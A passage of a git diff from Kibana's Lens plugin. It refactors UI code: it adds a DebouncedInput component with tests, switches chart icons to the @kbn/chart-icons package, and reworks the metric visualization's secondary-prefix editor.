'xpack.lens.confirmModal.saveDuplicateConfirmationMessage', { defaultMessage: `A {name} with the title '{title}' already exists. Would you like to save anyway?`, - values: { title: savedObject.title, name: savedObject.getDisplayName() }, + values: { title, name: displayName }, } ); const confirmButtonText = i18n.translate('xpack.lens.confirmModal.saveDuplicateButtonLabel', { defaultMessage: 'Save {name}', - values: { name: savedObject.getDisplayName() }, + values: { name: displayName }, }); try { return confirmModalPromise(confirmMessage, '', confirmButtonText, overlays); diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/find_object_by_title.test.ts b/x-pack/plugins/lens/public/persistence/saved_objects_utils/find_object_by_title.test.ts index 0d117220b895b..0e71b30b042e5 100644 --- a/x-pack/plugins/lens/public/persistence/saved_objects_utils/find_object_by_title.test.ts +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/find_object_by_title.test.ts @@ -6,7 +6,7 @@ */ import { findObjectByTitle } from './find_object_by_title'; -import { SavedObjectsClientContract, SavedObject } from '@kbn/core/public'; +import { SavedObjectsClientContract, SimpleSavedObject } from '@kbn/core/public'; import { simpleSavedObjectMock } from '@kbn/core/public/mocks'; describe('findObjectByTitle', () => { @@ -24,7 +24,8 @@ describe('findObjectByTitle', () => { it('matches any case', async () => { const indexPattern = simpleSavedObjectMock.create(savedObjectsClient, { attributes: { title: 'foo' }, - } as SavedObject); + } as SimpleSavedObject); + savedObjectsClient.find = jest.fn().mockImplementation(() => Promise.resolve({ savedObjects: [indexPattern], diff --git a/x-pack/plugins/lens/public/persistence/saved_objects_utils/types.ts b/x-pack/plugins/lens/public/persistence/saved_objects_utils/types.ts new file mode 100644 index 0000000000000..49772c2db90a2 --- /dev/null +++ b/x-pack/plugins/lens/public/persistence/saved_objects_utils/types.ts @@ -0,0 +1,16 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +/** @internal */ +export interface ConfirmModalSavedObjectMeta { + id?: string; + title: string; + displayName: string; + lastSavedTitle: string; + copyOnSave: boolean; + isTitleDuplicateConfirmed: boolean; +} diff --git a/x-pack/plugins/lens/public/shared_components/debounced_input.test.tsx b/x-pack/plugins/lens/public/shared_components/debounced_input.test.tsx new file mode 100644 index 0000000000000..feab19d02c720 --- /dev/null +++ b/x-pack/plugins/lens/public/shared_components/debounced_input.test.tsx @@ -0,0 +1,76 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { EuiFieldText } from '@elastic/eui'; +import { mount } from 'enzyme'; +import { DebouncedInput } from './debounced_input'; +import { act } from 'react-dom/test-utils'; + +jest.mock('lodash', () => { + const original = jest.requireActual('lodash'); + + return { + ...original, + debounce: (fn: unknown) => fn, + }; +}); + +describe('DebouncedInput', () => { + it('should render', () => { + const mockOnChange = jest.fn(); + const wrapper = mount( + + ); + + const textProps = wrapper.find(EuiFieldText).props(); + expect(textProps.value).toBe('my value'); + expect(textProps.placeholder).toBe('default value'); + + act(() => { + textProps.onChange!({ + target: { value: 'new value' }, + } as unknown as React.ChangeEvent); + }); + expect(mockOnChange).toHaveBeenCalledWith('new value'); + }); + + it('should update placeholder when default value changes', () => { + const wrapper = mount( + {}} defaultValue={'old default'} /> + ); + + expect(wrapper.find(EuiFieldText).props().placeholder).toBe('old default'); + + act(() => { + wrapper.setProps({ defaultValue: 'new default' }); + }); + + expect(wrapper.find(EuiFieldText).props().placeholder).toBe('new default'); + }); + + it('should forward text field props', () => { + const wrapper = mount( + {}} + defaultValue={'old default'} + /> + ); + + expect(wrapper.find(EuiFieldText).props()).toEqual( + expect.objectContaining({ + compressed: true, + fullWidth: true, + readOnly: true, + }) + ); + }); +}); diff --git a/x-pack/plugins/lens/public/shared_components/debounced_input.tsx b/x-pack/plugins/lens/public/shared_components/debounced_input.tsx new file mode 100644 index 0000000000000..cd309a2bb0bfd --- /dev/null +++ b/x-pack/plugins/lens/public/shared_components/debounced_input.tsx @@ -0,0 +1,54 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import React from 'react'; +import { EuiFieldText, EuiFieldTextProps } from '@elastic/eui'; +import { useDebouncedValue } from './debounced_value'; + +type Props = { + value: string; + onChange: (value: string) => void; + defaultValue?: string; + allowFalsyValue?: boolean; +} & Omit; + +const DebouncedInputHelper = ({ + onChange, + value, + defaultValue, + allowFalsyValue, + ...rest +}: Props) => { + const { inputValue, handleInputChange, initialValue } = useDebouncedValue( + { + onChange, + value, + defaultValue, + }, + { allowFalsyValue } + ); + + return ( + { + handleInputChange(e.target.value); + }} + placeholder={initialValue} + /> + ); +}; + +/** + * When testing this component, mock the "debounce" function in lodash (see this module test for an example) + */ +export const DebouncedInput = (props: Props) => ( + // need this extra layer to force a rerender whenever the default value changes. + // this is because we need a new initialValue to be computed from the debounce hook. + +); diff --git a/x-pack/plugins/lens/public/shared_components/name_input.tsx b/x-pack/plugins/lens/public/shared_components/name_input.tsx index 9502c7df93d55..e455caa199dd0 100644 --- a/x-pack/plugins/lens/public/shared_components/name_input.tsx +++ b/x-pack/plugins/lens/public/shared_components/name_input.tsx @@ -7,8 +7,8 @@ import React from 'react'; import { i18n } from '@kbn/i18n'; -import { EuiFormRow, EuiFieldText } from '@elastic/eui'; -import { useDebouncedValue } from '.'; +import { EuiFormRow } from '@elastic/eui'; +import { DebouncedInput } from './debounced_input'; export const NameInput = ({ value, @@ -19,12 +19,6 @@ export const NameInput = ({ onChange: (value: string) => void; defaultValue?: string; }) => { - const { inputValue, handleInputChange, initialValue } = useDebouncedValue({ - onChange, - value, - defaultValue, - }); - return ( - { - handleInputChange(e.target.value); - }} - placeholder={initialValue} + value={value} + onChange={onChange} + defaultValue={defaultValue} /> ); diff --git a/x-pack/plugins/lens/public/shared_components/toolbar_popover.tsx b/x-pack/plugins/lens/public/shared_components/toolbar_popover.tsx index 9d806b79f8311..dbb3d69588624 100644 --- a/x-pack/plugins/lens/public/shared_components/toolbar_popover.tsx +++ b/x-pack/plugins/lens/public/shared_components/toolbar_popover.tsx @@ -9,7 +9,7 @@ import './toolbar_popover.scss'; import React, { useState } from 'react'; import { EuiFlexItem, EuiPopover, EuiIcon, EuiPopoverTitle, IconType } from '@elastic/eui'; import { ToolbarButton, ToolbarButtonProps } from '@kbn/kibana-react-plugin/public'; -import { EuiIconLegend } from '../assets/legend'; +import { EuiIconLegend } from '@kbn/chart-icons'; const typeToIconMap: { [type: string]: string | IconType } = { legend: EuiIconLegend as IconType, diff --git a/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.test.tsx b/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.test.tsx index e40b7b0c079ec..c1986b9ff7ef5 100644 --- a/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.test.tsx +++ b/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.test.tsx @@ -14,7 +14,7 @@ import { IAggType } from '@kbn/data-plugin/public'; import { IFieldFormat, SerializedFieldFormat } from '@kbn/field-formats-plugin/common'; import { VisualizationContainer } from '../../../visualization_container'; import { EmptyPlaceholder } from '@kbn/charts-plugin/public'; -import { LensIconChartDatatable } from '../../../assets/chart_datatable'; +import { IconChartDatatable } from '@kbn/chart-icons'; import { DataContext, DatatableComponent } from './table_basic'; import { DatatableProps } from '../../../../common/expressions'; import { chartPluginMock } from '@kbn/charts-plugin/public/mocks'; @@ -369,7 +369,7 @@ describe('DatatableComponent', () => { /> ); expect(component.find(VisualizationContainer)).toHaveLength(1); - expect(component.find(EmptyPlaceholder).prop('icon')).toEqual(LensIconChartDatatable); + expect(component.find(EmptyPlaceholder).prop('icon')).toEqual(IconChartDatatable); }); test('it renders the table with the given sorting', () => { diff --git a/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.tsx b/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.tsx index 0262d3d7cab40..fe0a7da701f2a 100644 --- a/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.tsx +++ b/x-pack/plugins/lens/public/visualizations/datatable/components/table_basic.tsx @@ -29,12 +29,12 @@ import { } from '@elastic/eui'; import { EmptyPlaceholder } from '@kbn/charts-plugin/public'; import { ClickTriggerEvent } from '@kbn/charts-plugin/public'; +import { IconChartDatatable } from '@kbn/chart-icons'; import type { LensTableRowContextMenuEvent } from '../../../types'; import type { FormatFactory } from '../../../../common'; import type { LensGridDirection } from '../../../../common/expressions'; import { VisualizationContainer } from '../../../visualization_container'; import { findMinMaxByColumnId } from '../../../shared_components'; -import { LensIconChartDatatable } from '../../../assets/chart_datatable'; import type { DataContextType, DatatableRenderProps, @@ -413,7 +413,7 @@ export const DatatableComponent = (props: DatatableRenderProps) => { if (isEmpty) { return ( - + ); } diff --git a/x-pack/plugins/lens/public/visualizations/datatable/visualization.tsx b/x-pack/plugins/lens/public/visualizations/datatable/visualization.tsx index 36be3492680ea..8b9f2fe4bc4ed 100644 --- a/x-pack/plugins/lens/public/visualizations/datatable/visualization.tsx +++ b/x-pack/plugins/lens/public/visualizations/datatable/visualization.tsx @@ -14,13 +14,13 @@ import { PaletteRegistry, CUSTOM_PALETTE } from '@kbn/coloring'; import { ThemeServiceStart } from '@kbn/core/public'; import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; import { VIS_EVENT_TO_TRIGGER } from '@kbn/visualizations-plugin/public'; +import { IconChartDatatable } from '@kbn/chart-icons'; import type { SuggestionRequest, Visualization, VisualizationSuggestion, DatasourceLayers, } from '../../types'; -import { LensIconChartDatatable } from '../../assets/chart_datatable'; import { TableDimensionEditor } from './components/dimension_editor'; import { TableDimensionEditorAdditionalSection } from './components/dimension_editor_addtional_section'; import { LayerType, layerTypes } from '../../../common'; @@ -56,7 +56,7 @@ export const getDatatableVisualization = ({ visualizationTypes: [ { id: 'lnsDatatable', - icon: LensIconChartDatatable, + icon: IconChartDatatable, label: visualizationLabel, groupLabel: i18n.translate('xpack.lens.datatable.groupLabel', { defaultMessage: 'Tabular', @@ -82,7 +82,7 @@ export const getDatatableVisualization = ({ getDescription() { return { - icon: LensIconChartDatatable, + icon: IconChartDatatable, label: visualizationLabel, }; }, @@ -164,7 +164,7 @@ export const getDatatableVisualization = ({ columnId: col.columnId, })), }, - previewIcon: LensIconChartDatatable, + previewIcon: IconChartDatatable, // tables are hidden from suggestion bar, but used for drag & drop and chart switching hide: true, }, diff --git a/x-pack/plugins/lens/public/visualizations/gauge/visualization.tsx b/x-pack/plugins/lens/public/visualizations/gauge/visualization.tsx index a531181a2cba5..8c35a44242955 100644 --- a/x-pack/plugins/lens/public/visualizations/gauge/visualization.tsx +++ b/x-pack/plugins/lens/public/visualizations/gauge/visualization.tsx @@ -21,9 +21,8 @@ import { getMaxValue, getMinValue, getValueFromAccessor, - VerticalBulletIcon, - HorizontalBulletIcon, } from '@kbn/expression-gauge-plugin/public'; +import { IconChartHorizontalBullet, IconChartVerticalBullet } from '@kbn/chart-icons'; import type { DatasourceLayers, OperationMetadata, Visualization } from '../../types'; import { getSuggestions } from './suggestions'; import { @@ -56,14 +55,14 @@ export const isNumericDynamicMetric = (op: OperationMetadata) => export const CHART_NAMES = { horizontalBullet: { - icon: HorizontalBulletIcon, + icon: IconChartHorizontalBullet, label: i18n.translate('xpack.lens.gaugeHorizontal.gaugeLabel', { defaultMessage: 'Gauge horizontal', }), groupLabel: groupLabelForGauge, }, verticalBullet: { - icon: VerticalBulletIcon, + icon: IconChartVerticalBullet, label: i18n.translate('xpack.lens.gaugeVertical.gaugeLabel', { defaultMessage: 'Gauge vertical', }), diff --git a/x-pack/plugins/lens/public/visualizations/heatmap/constants.ts b/x-pack/plugins/lens/public/visualizations/heatmap/constants.ts index 270d45ce3cec5..51e674048e873 100644 --- a/x-pack/plugins/lens/public/visualizations/heatmap/constants.ts +++ b/x-pack/plugins/lens/public/visualizations/heatmap/constants.ts @@ -6,7 +6,7 @@ */ import { i18n } from '@kbn/i18n'; -import { HeatmapIcon } from '@kbn/expression-heatmap-plugin/public'; +import { IconChartHeatmap } from '@kbn/chart-icons'; export const LENS_HEATMAP_RENDERER = 'lens_heatmap_renderer'; @@ -24,7 +24,7 @@ export const CHART_SHAPES = { export const CHART_NAMES = { heatmap: { shapeType: CHART_SHAPES.HEATMAP, - icon: HeatmapIcon, + icon: IconChartHeatmap, label: i18n.translate('xpack.lens.heatmap.heatmapLabel', { defaultMessage: 'Heat map', }), diff --git a/x-pack/plugins/lens/public/visualizations/heatmap/toolbar_component.tsx b/x-pack/plugins/lens/public/visualizations/heatmap/toolbar_component.tsx index b0a80ca297a0a..d14bf621df08e 100644 --- a/x-pack/plugins/lens/public/visualizations/heatmap/toolbar_component.tsx +++ b/x-pack/plugins/lens/public/visualizations/heatmap/toolbar_component.tsx @@ -10,6 +10,7 @@ import { EuiFlexGroup, EuiFlexItem, IconType } from '@elastic/eui'; import { Position } from '@elastic/charts'; import { i18n } from '@kbn/i18n'; import { LegendSize } from '@kbn/visualizations-plugin/public'; +import { EuiIconAxisLeft, EuiIconAxisBottom } from '@kbn/chart-icons'; import type { VisualizationToolbarProps } from '../../types'; import { LegendSettingsPopover, @@ -18,8 +19,6 @@ import { AxisTitleSettings, TooltipWrapper, } from '../../shared_components'; -import { EuiIconAxisLeft } from '../../assets/axis_left'; -import { EuiIconAxisBottom } from '../../assets/axis_bottom'; import type { HeatmapVisualizationState } from './types'; import { getDefaultVisualValuesForLayer } from '../../shared_components/datasource_default_values'; import './toolbar_component.scss'; diff --git a/x-pack/plugins/lens/public/visualizations/heatmap/visualization.tsx b/x-pack/plugins/lens/public/visualizations/heatmap/visualization.tsx index 2f08a31151401..09548df0a67e4 100644 --- a/x-pack/plugins/lens/public/visualizations/heatmap/visualization.tsx +++ b/x-pack/plugins/lens/public/visualizations/heatmap/visualization.tsx @@ -11,11 +11,11 @@ import { i18n } from '@kbn/i18n'; import { FormattedMessage, I18nProvider } from '@kbn/i18n-react'; import { Ast } from '@kbn/interpreter'; import { Position } from '@elastic/charts'; +import { IconChartHeatmap } from '@kbn/chart-icons'; import { CUSTOM_PALETTE, PaletteRegistry, CustomPaletteParams } from '@kbn/coloring'; import { ThemeServiceStart } from '@kbn/core/public'; import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; import { VIS_EVENT_TO_TRIGGER } from '@kbn/visualizations-plugin/public'; -import { HeatmapIcon } from '@kbn/expression-heatmap-plugin/public'; import type { OperationMetadata, Visualization } from '../../types'; import type { HeatmapVisualizationState } from './types'; import { getSuggestions } from './suggestions'; @@ -105,7 +105,7 @@ export const getHeatmapVisualization = ({ visualizationTypes: [ { id: 'heatmap', - icon: HeatmapIcon, + icon: IconChartHeatmap, label: i18n.translate('xpack.lens.heatmapVisualization.heatmapLabel', { defaultMessage: 'Heat map', }), diff --git a/x-pack/plugins/lens/public/visualizations/legacy_metric/metric_suggestions.ts b/x-pack/plugins/lens/public/visualizations/legacy_metric/metric_suggestions.ts index 32a5831618251..6fa35a8a17821 100644 --- a/x-pack/plugins/lens/public/visualizations/legacy_metric/metric_suggestions.ts +++ b/x-pack/plugins/lens/public/visualizations/legacy_metric/metric_suggestions.ts @@ -5,10 +5,10 @@ * 2.0. */ +import { IconChartMetric } from '@kbn/chart-icons'; import { SuggestionRequest, VisualizationSuggestion, TableSuggestion } from '../../types'; import type { MetricState } from '../../../common/types'; import { layerTypes } from '../../../common'; -import { LensIconChartMetric } from '../../assets/chart_metric'; import { legacyMetricSupportedTypes } from './visualization'; /** @@ -49,7 +49,7 @@ function getSuggestion(table: TableSuggestion): VisualizationSuggestion { const original = jest.requireActual('lodash'); @@ -64,39 +65,43 @@ describe('dimension editor', () => { palette, }; - const mockedFrame = createMockFramePublicAPI(); - - const props: VisualizationDimensionEditorProps & { + let props: VisualizationDimensionEditorProps & { paletteService: PaletteRegistry; - } = { - layerId: 'first', - groupId: 'some-group', - accessor: 'some-accessor', - state: fullState, - frame: mockedFrame, - setState: jest.fn(), - panelRef: {} as React.MutableRefObject, - paletteService: chartPluginMock.createPaletteRegistry(), }; + beforeEach(() => { + props = { + layerId: 'first', + groupId: 'some-group', + accessor: 'some-accessor', + state: fullState, + frame: createMockFramePublicAPI(), + setState: jest.fn(), + panelRef: {} as React.MutableRefObject, + paletteService: chartPluginMock.createPaletteRegistry(), + }; + }); + describe('primary metric dimension', () => { const accessor = 'primary-metric-col-id'; - props.frame.activeData = { - first: { - type: 'datatable', - columns: [ - { - id: accessor, - name: 'foo', - meta: { - type: 'number', + beforeEach(() => { + props.frame.activeData = { + first: { + type: 'datatable', + columns: [ + { + id: accessor, + name: 'foo', + meta: { + type: 'number', + }, }, - }, - ], - rows: [], - }, - }; + ], + rows: [], + }, + }; + }); class Harness { public _wrapper; @@ -200,6 +205,24 @@ describe('dimension editor', () => { describe('secondary metric dimension', () => { const accessor = 'secondary-metric-col-id'; + beforeEach(() => { + props.frame.activeData = { + first: { + type: 'datatable', + columns: [ + { + id: accessor, + name: 'foo', + meta: { + type: 'number', + }, + }, + ], + rows: [], + }, + }; + }); + it('renders when the accessor matches', () => { const component = shallow( { expect(component.exists(SELECTORS.PRIMARY_METRIC_EDITOR)).toBeFalsy(); }); - it('sets metric prefix', () => { - const setState = jest.fn(); - const localState = { ...fullState, secondaryMetricAccessor: accessor }; - const component = shallow( - - ); + describe('metric prefix', () => { + const NONE_PREFIX = ''; + const AUTO_PREFIX = undefined; + + it('activates the correct buttons', () => { + const setState = jest.fn(); + const localState = { + ...fullState, + secondaryPrefix: AUTO_PREFIX, + secondaryMetricAccessor: accessor, + }; + const component = mount( + + ); + + expect(component.find(EuiButtonGroup).props().idSelected).toContain('auto'); + + component.setProps({ + state: { + ...localState, + secondaryPrefix: NONE_PREFIX, + }, + }); - const newVal = 'Metric explanation'; - component.find(EuiFieldText).props().onChange!({ - target: { value: newVal }, - } as ChangeEvent); - expect(setState).toHaveBeenCalledWith({ ...localState, secondaryPrefix: newVal }); + expect(component.find(EuiButtonGroup).props().idSelected).toContain('none'); + + component.setProps({ + state: { + ...localState, + secondaryPrefix: 'some custom prefix', + }, + }); + + expect(component.find(EuiButtonGroup).props().idSelected).toContain('custom'); + }); + + it('clicking a button sets the prefix value', () => { + const setState = jest.fn(); + const localState = { + ...fullState, + secondaryPrefix: AUTO_PREFIX, + secondaryMetricAccessor: accessor, + }; + const component = mount( + + ); + + const newVal = 'Metric explanation'; + + component.find(EuiButtonGroup).props().onChange('some-id', newVal); + + expect(setState).toHaveBeenCalledWith({ ...localState, secondaryPrefix: newVal }); + }); + + it('sets a custom prefix value', () => { + const setState = jest.fn(); + const localState = { + ...fullState, + secondaryPrefix: 'foo', + secondaryMetricAccessor: accessor, + }; + const component = mount( + + ); + + const buttonGroup = component.find(EuiButtonGroup); + + // make sure that if the user was to select the "custom" option, they would get the default value + expect(buttonGroup.props().options[1].value).toBe('foo'); + + const newVal = 'bar'; + + component.find(DebouncedInput).props().onChange(newVal); + + expect(setState).toHaveBeenCalledWith({ ...localState, secondaryPrefix: newVal }); + }); }); }); diff --git a/x-pack/plugins/lens/public/visualizations/metric/dimension_editor.tsx b/x-pack/plugins/lens/public/visualizations/metric/dimension_editor.tsx index 198f3dd755ebc..4439b22cd705f 100644 --- a/x-pack/plugins/lens/public/visualizations/metric/dimension_editor.tsx +++ b/x-pack/plugins/lens/public/visualizations/metric/dimension_editor.tsx @@ -11,12 +11,12 @@ import { EuiColorPaletteDisplay, EuiFormRow, EuiFlexItem, - EuiFieldText, EuiButtonGroup, EuiFieldNumber, htmlIdGenerator, EuiColorPicker, euiPaletteColorBlind, + EuiSpacer, } from '@elastic/eui'; import { LayoutDirection } from '@elastic/charts'; import React, { useCallback, useState } from 'react'; @@ -30,6 +30,7 @@ import { } from '@kbn/coloring'; import { getDataBoundsForPalette } from '@kbn/expression-metric-vis-plugin/public'; import { css } from '@emotion/react'; +import { getColumnByAccessor } from '@kbn/visualizations-plugin/common/utils'; import { isNumericFieldForDatatable } from '../../../common/expressions'; import { applyPaletteParams, @@ -40,63 +41,42 @@ import type { VisualizationDimensionEditorProps } from '../../types'; import { defaultNumberPaletteParams, defaultPercentagePaletteParams } from './palette_config'; import { DEFAULT_MAX_COLUMNS, getDefaultColor, MetricVisualizationState } from './visualization'; import { CollapseSetting } from '../../shared_components/collapse_setting'; +import { DebouncedInput } from '../../shared_components/debounced_input'; type Props = VisualizationDimensionEditorProps & { paletteService: PaletteRegistry; }; -export function DimensionEditor(props: Props) { - const { state, setState, accessor } = props; +type SubProps = Props & { idPrefix: string }; - const setPrefix = useCallback( - (prefix: string) => setState({ ...state, secondaryPrefix: prefix }), - [setState, state] - ); +export function DimensionEditor(props: Props) { + const { state, accessor } = props; - const { inputValue: prefixInputVal, handleInputChange: handlePrefixChange } = - useDebouncedValue( - { - onChange: setPrefix, - value: state.secondaryPrefix || '', - }, - { allowFalsyValue: true } - ); + const idPrefix = htmlIdGenerator()(); switch (accessor) { case state?.metricAccessor: return (

- +
); case state.secondaryMetricAccessor: return (
- - handlePrefixChange(value)} - /> - +
); case state.maxAccessor: return ( -
- +
+
); case state.breakdownByAccessor: return (
- +
); default: @@ -104,7 +84,7 @@ export function DimensionEditor(props: Props) { } } -function BreakdownByEditor({ setState, state }: Props) { +function BreakdownByEditor({ setState, state }: SubProps) { const setMaxCols = useCallback( (columns: string) => { setState({ ...state, maxCols: parseInt(columns, 10) }); @@ -148,8 +128,7 @@ function BreakdownByEditor({ setState, state }: Props) { ); } -function MaximumEditor({ setState, state }: Props) { - const idPrefix = htmlIdGenerator()(); +function MaximumEditor({ setState, state, idPrefix }: SubProps) { return ( + + <> + { + setState({ + ...state, + secondaryPrefix, + }); + }} + /> + + {state.secondaryPrefix && ( + { + setState({ + ...state, + secondaryPrefix: newPrefix, + }); + }} + /> + )} + + +
+ ); +} + +function PrimaryMetricEditor(props: SubProps) { + const { state, setState, frame, accessor, idPrefix } = props; const [isPaletteOpen, setIsPaletteOpen] = useState(false); @@ -235,7 +294,6 @@ function PrimaryMetricEditor(props: Props) { const togglePalette = () => setIsPaletteOpen(!isPaletteOpen); - const idPrefix = htmlIdGenerator()(); return ( <> { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.51, }, ]); @@ -182,7 +182,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.51, }, ]); @@ -214,7 +214,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.51, }, ]); @@ -287,7 +287,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.52, }, ]); @@ -319,7 +319,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.52, }, ]); @@ -350,7 +350,7 @@ describe('metric suggestions', () => { }, title: 'Metric', hide: true, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.52, }, ]); diff --git a/x-pack/plugins/lens/public/visualizations/metric/suggestions.ts b/x-pack/plugins/lens/public/visualizations/metric/suggestions.ts index cdb11812bc4b8..ae40bf83574f4 100644 --- a/x-pack/plugins/lens/public/visualizations/metric/suggestions.ts +++ b/x-pack/plugins/lens/public/visualizations/metric/suggestions.ts @@ -5,8 +5,8 @@ * 2.0. */ +import { IconChartMetric } from '@kbn/chart-icons'; import type { TableSuggestion, Visualization } from '../../types'; -import { LensIconChartMetric } from '../../assets/chart_metric'; import { layerTypes } from '../../../common'; import { metricLabel, MetricVisualizationState, supportedDataTypes } from './visualization'; @@ -59,7 +59,7 @@ export const getSuggestions: Visualization['getSuggest layerType: layerTypes.DATA, }, title: metricLabel, - previewIcon: LensIconChartMetric, + previewIcon: IconChartMetric, score: 0.5, // don't show suggestions since we're in tech preview hide: true, diff --git a/x-pack/plugins/lens/public/visualizations/metric/visualization.tsx b/x-pack/plugins/lens/public/visualizations/metric/visualization.tsx index 8651d4b76e95b..cb1d5a53c8e3c 100644 --- a/x-pack/plugins/lens/public/visualizations/metric/visualization.tsx +++ b/x-pack/plugins/lens/public/visualizations/metric/visualization.tsx @@ -16,9 +16,9 @@ import { VIS_EVENT_TO_TRIGGER } from '@kbn/visualizations-plugin/public'; import { LayoutDirection } from '@elastic/charts'; import { euiLightVars, euiThemeVars } from '@kbn/ui-theme'; import { KibanaThemeProvider } from '@kbn/kibana-react-plugin/public'; +import { IconChartMetric } from '@kbn/chart-icons'; import { LayerType } from '../../../common'; import { getSuggestions } from './suggestions'; -import { LensIconChartMetric } from '../../assets/chart_metric'; import { Visualization, OperationMetadata, DatasourceLayers, AccessorConfig } from '../../types'; import { layerTypes } from '../../../common'; import { GROUP_ID, LENS_METRIC_ID } from './constants'; @@ -125,7 +125,8 @@ const toExpression = ( arguments: { metric: state.metricAccessor ? [state.metricAccessor] : [], secondaryMetric: state.secondaryMetricAccessor ? [state.secondaryMetricAccessor] : [], - secondaryPrefix: state.secondaryPrefix ? [state.secondaryPrefix] : [], + secondaryPrefix: + typeof state.secondaryPrefix !== 'undefined' ? [state.secondaryPrefix] : [], max: state.maxAccessor ? [state.maxAccessor] : [], breakdownBy: state.breakdownByAccessor && !state.collapseFn ? [state.breakdownByAccessor] : [], @@ -166,7 +167,7 @@ export const getMetricVisualization = ({ visualizationTypes: [ { id: LENS_METRIC_ID, - icon: LensIconChartMetric, + icon: IconChartMetric, label: metricLabel, groupLabel: metricGroupLabel, showExperimentalBadge: true, @@ -197,7 +198,7 @@ export const getMetricVisualization = ({ getDescription() { return { - icon: LensIconChartMetric, + icon: IconChartMetric, label: metricLabel, }; }, diff --git a/x-pack/plugins/lens/public/visualizations/partition/partition_charts_meta.ts b/x-pack/plugins/lens/public/visualizations/partition/partition_charts_meta.ts index 6d948ce4332fc..888fe7853b27b 100644 --- a/x-pack/plugins/lens/public/visualizations/partition/partition_charts_meta.ts +++ b/x-pack/plugins/lens/public/visualizations/partition/partition_charts_meta.ts @@ -9,11 +9,13 @@ import { i18n } from '@kbn/i18n'; import type { EuiIconProps } from '@elastic/eui'; import type { DatatableColumn } from '@kbn/expressions-plugin/common'; -import { LensIconChartDonut } from '../../assets/chart_donut'; -import { LensIconChartPie } from '../../assets/chart_pie'; -import { LensIconChartTreemap } from '../../assets/chart_treemap'; -import { LensIconChartMosaic } from '../../assets/chart_mosaic'; -import { LensIconChartWaffle } from '../../assets/chart_waffle'; +import { + IconChartDonut, + IconChartPie, + IconChartTreemap, + IconChartMosaic, + IconChartWaffle, +} from '@kbn/chart-icons'; import { CategoryDisplay, NumberDisplay, @@ -140,7 +142,7 @@ const emptySizeRatioOptions: PartitionChartMeta['toolbarPopover']['emptySizeRati export const PartitionChartsMeta: Record = { donut: { - icon: LensIconChartDonut, + icon: IconChartDonut, label: i18n.translate('xpack.lens.pie.donutLabel', { defaultMessage: 'Donut', }), @@ -156,7 +158,7 @@ export const PartitionChartsMeta: Record = { }, }, pie: { - icon: LensIconChartPie, + icon: IconChartPie, label: i18n.translate('xpack.lens.pie.pielabel', { defaultMessage: 'Pie', }), @@ -171,7 +173,7 @@ export const PartitionChartsMeta: Record = { }, }, treemap: { - icon: LensIconChartTreemap, + icon: IconChartTreemap, label: i18n.translate('xpack.lens.pie.treemaplabel', { defaultMessage: 'Treemap', }), @@ -186,7 +188,7 @@ export const PartitionChartsMeta: Record = { }, }, mosaic: { - icon: LensIconChartMosaic, + icon: IconChartMosaic, label: i18n.translate('xpack.lens.pie.mosaiclabel', { defaultMessage: 'Mosaic', }), @@ -203,7 +205,7 @@ export const PartitionChartsMeta: Record = { requiredMinDimensionCount: 2, }, waffle: { - icon: LensIconChartWaffle, + icon: IconChartWaffle, label: i18n.translate('xpack.lens.pie.wafflelabel', { defaultMessage: 'Waffle', }), diff --git a/x-pack/plugins/lens/public/visualizations/xy/annotations/helpers.tsx b/x-pack/plugins/lens/public/visualizations/xy/annotations/helpers.tsx index 480417ab2cbad..4c60934ef9114 100644 --- a/x-pack/plugins/lens/public/visualizations/xy/annotations/helpers.tsx +++ b/x-pack/plugins/lens/public/visualizations/xy/annotations/helpers.tsx @@ -13,6 +13,7 @@ import { isRangeAnnotation, } from '@kbn/event-annotation-plugin/public'; import { EventAnnotationConfig } from '@kbn/event-annotation-plugin/common'; +import { IconChartBarAnnotations } from '@kbn/chart-icons'; import { layerTypes } from '../../../../common'; import type { FramePublicAPI, Visualization } from '../../../types'; import { isHorizontalChart } from '../state_helpers'; @@ -24,7 +25,6 @@ import { getDataLayers, isAnnotationsLayer, } from '../visualization_helpers'; -import { LensIconChartBarAnnotations } from '../../../assets/chart_bar_annotations'; import { generateId } from '../../../id_generator'; const MAX_DATE = 8640000000000000; @@ -106,7 +106,7 @@ export const getAnnotationsSupportedLayer = ( label: i18n.translate('xpack.lens.xyChart.addAnnotationsLayerLabel', { defaultMessage: 'Annotations', }), - icon: LensIconChartBarAnnotations, + icon: IconChartBarAnnotations, disabled: !hasDateHistogram, toolTipContent: !hasDateHistogram ? i18n.translate('xpack.lens.xyChart.addAnnotationsLayerLabelDisabledHelp', { diff --git a/x-pack/plugins/lens/public/visualizations/xy/reference_line_helpers.tsx b/x-pack/plugins/lens/public/visualizations/xy/reference_line_helpers.tsx index 